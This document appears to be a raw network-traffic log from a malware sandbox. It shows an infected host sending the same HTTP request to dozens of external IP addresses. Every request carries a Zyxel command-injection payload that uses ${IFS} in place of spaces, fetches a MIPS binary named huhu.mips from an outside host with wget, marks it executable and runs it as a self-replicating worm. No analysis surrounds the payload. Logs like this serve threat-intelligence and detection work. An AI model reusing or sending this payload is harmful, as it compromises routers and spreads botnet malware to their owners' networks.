                                                Jan 29, 2024 07:08:05.686146975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8765192.168.2.233373691.68.198.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686197996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8766192.168.2.2341904141.212.109.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686230898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8767192.168.2.2347410168.158.5.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686264992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8768192.168.2.2343116114.28.219.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686294079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8769192.168.2.2339352204.150.91.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686335087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8770192.168.2.236074049.104.87.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686362982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8771192.168.2.235850096.218.85.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686395884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8772192.168.2.233480836.207.44.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686451912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8773192.168.2.2344040206.217.170.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686487913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8774192.168.2.2355920171.160.174.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686517954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8775192.168.2.2341598147.221.244.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686563015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8776192.168.2.2358734195.228.246.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686594009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8777192.168.2.234962854.248.210.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686626911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8778192.168.2.2335770103.174.205.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686682940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8779192.168.2.233581276.245.174.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686722994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8780192.168.2.233840047.111.142.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686733961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8781192.168.2.233544045.107.116.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686774015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8782192.168.2.233902894.0.72.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686808109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8783192.168.2.2338316156.103.15.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686831951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8784192.168.2.233779292.156.62.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686892033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8785192.168.2.2354042177.54.208.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686924934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8786192.168.2.235001032.253.181.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686975956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8787192.168.2.2359204200.100.71.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687000990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8788192.168.2.233773624.0.114.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687050104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8789192.168.2.235833018.136.124.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687084913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8790192.168.2.235215286.253.163.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687122107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8791192.168.2.235084883.72.32.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687181950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8792192.168.2.2358202186.157.88.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687222004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8793192.168.2.2343698120.126.222.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687261105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8794192.168.2.233640237.238.211.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687283993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8795192.168.2.2355378129.3.235.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687344074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8796192.168.2.2354550208.229.122.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687370062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8797192.168.2.2356980173.219.88.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687426090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8798192.168.2.2347270117.6.169.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687458038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8799192.168.2.2336808149.44.28.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687494993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8800192.168.2.2344982192.240.90.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687542915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8801192.168.2.2352234138.231.74.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687602997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8802192.168.2.2352106149.133.84.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687623024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8803192.168.2.2343516129.185.11.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687661886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8804192.168.2.2349488167.182.47.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687711000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8805192.168.2.23590824.135.178.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687747002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8806192.168.2.234738071.108.139.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687803984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8807192.168.2.2359980134.221.228.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687850952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8808192.168.2.2356342116.11.149.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687886953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8809192.168.2.2357298194.32.137.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687923908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8810192.168.2.2332962145.226.167.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687957048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8811192.168.2.2338104197.95.213.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.687993050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8812192.168.2.2350414217.38.222.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688029051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8813192.168.2.2334624203.192.79.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688076019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8814192.168.2.236008285.169.43.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688111067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8815192.168.2.235493434.227.132.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688169956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8816192.168.2.2358458194.146.190.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688215971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8817192.168.2.2336988181.78.228.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688236952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8818192.168.2.235261847.116.55.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688277960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8819192.168.2.2357736221.206.211.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688307047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8820192.168.2.2341560126.85.209.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688342094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8821192.168.2.2352874219.238.10.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688388109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8822192.168.2.23427688.128.115.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688415051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8823192.168.2.2336146200.69.228.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688465118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8824192.168.2.2348192216.170.166.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688504934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8825192.168.2.2334944204.58.194.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688553095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8826192.168.2.2352372190.87.199.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.688591003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8827192.168.2.2347322193.224.70.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.691478014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8828192.168.2.2357104121.115.147.252443
                                                TimestampBytes transferredDirectionData
